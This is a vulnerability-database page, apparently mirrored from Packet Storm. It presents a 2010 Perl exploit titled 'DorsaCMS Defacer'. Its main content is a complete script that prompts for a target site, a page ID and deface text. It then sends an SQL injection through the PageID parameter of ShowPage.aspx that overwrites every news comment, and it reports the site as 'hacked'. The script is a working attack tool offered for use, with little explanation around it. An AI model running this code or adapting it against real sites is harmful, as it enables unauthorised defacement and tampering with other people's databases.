Lucene search
K

DorsaCMS SQL Injection

🗓️ 15 Dec 2010 00:00:00Reported by d3c0derType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

DorsaCMS SQL Injection Perl Exploit

Code
`#!/usr/bin/perl  
#d3c0der  
system('color a');  
system('cls');  
system('title DorsaCMS Defacer');  
print q{  
===================================================  
-= ** =-  
DorsaCMS Defacer  
  
[+] Coded by d3c0der => [email protected]  
  
[+] AttackerZ Under Ground Group => wwW.Attackerz.iR  
-= ** =-  
===================================================  
  
  
};  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
  
  
print "~# Target : ";  
$site=<STDIN>;  
chomp $site;  
print "~# PageID : ";  
$id=<STDIN>;  
chomp $id;  
print "~# Deface Text : ";  
$def=<STDIN>;  
chomp $def;  
  
if ( $site !~ /^http:/ ) {  
$site = 'http://' . $site;  
}  
if ( $site !~ /\/$/ ) {  
$site = $site . '/';  
}  
print "\n";  
  
print "->hacking : $site\n";  
  
  
  
  
@path1=("ShowPage.aspx?page_=news&PageID=$id update news set Comment='$def';--");  
  
foreach $ways(@path1){  
  
$final=$site.$ways;  
  
my $req=HTTP::Request->new(GET=>$final);  
my $ua=LWP::UserAgent->new();  
$ua->timeout(30);  
my $response=$ua->request($req);  
  
  
}  
  
print "[-] now this url is hacked $site./ShowPage.aspx?page_=news&PageID=.$id\n";  
  
  
  
  
##  
# By d3c0der  
##  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2010 00:00Current
0.4Low risk
Vulners AI Score0.4
21